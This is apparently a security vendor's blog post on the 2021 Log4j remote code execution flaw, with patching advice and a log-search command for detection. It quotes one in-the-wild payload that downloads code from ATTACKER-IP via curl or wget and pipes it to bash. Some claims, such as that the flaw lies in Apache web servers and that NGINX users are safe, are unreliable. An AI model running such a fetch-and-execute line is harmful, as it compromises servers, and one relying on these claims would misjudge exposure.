Log4j Vulnerability: The Perfect Holiday Gift Nobody Wants


A critical server security vulnerability in the Log4j Java logging library is taking the internet by storm because the code to actively exploit this vulnerability is already widely distributed across the web. Originally found on the popular Minecraft game, it has since been shown to affect most web servers running Apache as well as its ubiquitous Log4j logging library. It has been actively exploited by threat actors on the web. This is by far the most serious vulnerability of 2021, with a score of 10/10 on the CVSS scale. The vulnerability affects versions 2.14.1 and lower. It allows for the execution of arbitrary remote code and the potential for complete takeover of servers and endpoints by attackers.

Is my website secure?

The generic protection rules of our web application firewall protected against most of these exploitation attempts, however we quickly pushed a fix to cover the new range of variants discovered. Websites behind our firewall are protected against this attack.

If you are running a server such as a VPS (Virtual Private Server) and using Apache, you should take steps to correct your environment immediately and ensure that you are using the patched version 2.15.0. If your server is using NGINX, don’t worry.

That being said, the amount of software applications that use Log4j is extensive and doesn’t just apply to websites. Even some routers and other hardware devices use software that uses Log4j. Therefore, calling this attack surface “huge” doesn’t quite begin to describe the extent of this vulnerability. It is safe to assume that many organizations large and small have already been compromised. The severity of it is easily compared to other catastrophic security failures such as Shellshock, Heartbleed, and EternalBlue.

ShellShock Flashbacks

Long-time web security enthusiasts will recall the 2014 ShellShock Internet Disruption Vulnerability. Interestingly, this vulnerability works the same way in that vulnerable web servers can be compromised by the simple use of a modified user agent string.

Since the vulnerability is in the Apache logging library, the query user agent string is sufficient to perform an infection. Attackers just have to use jndi: ldap monitoring their payload. Apache will log the request and execute the arbitrary command residing on the controlled attacker ldap server.

Already exploited in the wild

Attackers immediately began to exploit this vulnerability. We have already seen many different attacks targeting this software, for example this base64 encoded request to potentially vulnerable Apache servers:

Let’s decrypt this chain and take a look at what this attack does:

(curl -s ATTACKER-IP:5874/VICTIM-IP:80||wget -q -O- ATTACKER-IP:5874/VICTIM-IP:80)|bash

It’s a simple loop command that uses wget to surreptitiously download malicious content from the attacker-controlled server to the victim server. Anyone can guess what exactly the content is, as it is controlled by attackers and can be changed / edited at will. One can only assume that they would use this exploit to take control of vulnerable web servers in order to spread malware and potentially compromise entire servers.

Have I been attacked?

If you have access to your server’s Apache logs, you can run the following command to check if your server has been targeted:

egrep -I -i -r '$({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^n]+' /var/log

This will show all attempts to exploit this vulnerability on your server, at least with the attacks known to date. Given the severity of this vulnerability, there are many new variations that evolve as I type this article.

In conclusion

If you own a website or operate a VPS or other server, be sure to update any software you use that uses log4j to the most recent patched version. You can also query your file system for recently changed files, or optionally restore your server to a secure snapshot before a possible compromise occurs, then update the vulnerable software immediately.

If you are wondering if any software you are using on your server or home / work network may be at risk, please review this handy list maintained by Nationaal Cyber ​​Security Centrum of the Netherlands.

If you are using a VPS, it would also be advisable to use an intrusion detection system such as OSSECHIDS on your server. This will help keep track of system file changes and other potential indicators of compromise on the server itself (rather than just your website).

To prevent your website from being a vector for this server exploit, you can also put your website behind our firewall and we will protect it from this attack and many others.


Comments are closed.